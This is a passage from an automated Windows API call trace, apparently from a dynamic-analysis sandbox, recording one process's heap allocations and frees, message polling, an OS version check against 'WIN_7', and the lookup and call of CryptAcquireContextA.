Flags=0x0, Size=0x8) returned 0x24b2ce8 [0242.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0242.853] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0242.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0242.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0242.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0242.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0242.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0242.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0242.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0242.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0242.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0242.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0242.854] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0242.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0242.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0242.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0242.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0242.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0242.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0242.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0242.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0242.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0242.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0242.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0242.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0242.855] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0242.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0242.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0242.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0242.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0242.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0242.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0242.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0242.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0242.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0242.855] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0242.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0242.855] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0242.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0242.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0242.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0242.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0242.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0242.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0242.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0242.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0242.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0242.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0242.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0242.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0242.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0242.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0242.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0242.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0242.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0242.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0242.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0242.856] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0242.856] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0242.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0242.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0242.857] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0242.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0242.857] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0242.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0242.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0242.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0242.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0242.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0242.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0242.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0242.857] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0242.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0242.857] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0242.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0242.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0242.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0242.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0242.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0242.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0242.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0242.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0242.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0242.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0242.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0242.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0242.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0242.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0242.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0242.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0242.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0242.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0242.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0242.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0242.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0242.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0242.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0242.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0242.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0242.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0242.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0242.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0242.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0242.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0242.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0242.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0242.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0242.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0242.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0242.859] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0242.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0242.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0242.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0242.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0242.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0242.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0242.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0242.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0242.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0242.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0242.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0242.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0242.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0242.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0242.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0242.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0242.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0242.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0242.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0242.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0242.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0242.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0242.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0242.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0242.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0242.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0242.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0242.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466e30, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0242.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0242.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0242.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0242.861] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0242.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0242.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0242.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0242.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b3a08 [0242.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0242.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0242.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0242.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x15) returned 0x2466e30 [0242.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466e30, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0242.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0242.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0242.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0242.862] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0242.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0242.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0242.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a08 | out: hHeap=0x25c0000) returned 1 [0242.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0242.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0242.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0242.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0242.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0242.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0242.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0242.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0242.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0242.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0242.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0242.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0242.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0242.863] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2720) returned 1 [0242.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0060 [0242.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0242.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0242.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0242.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0242.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0242.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0242.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0242.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0242.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0242.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0242.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0242.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0242.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0242.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0242.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0242.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0242.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0242.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0242.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0242.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0242.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0242.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0242.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0242.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0242.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0242.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0242.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0242.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0242.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0242.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0242.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0242.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0242.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0242.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0242.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0242.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0242.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0242.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0242.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0242.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0242.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0242.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0242.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0242.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0242.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 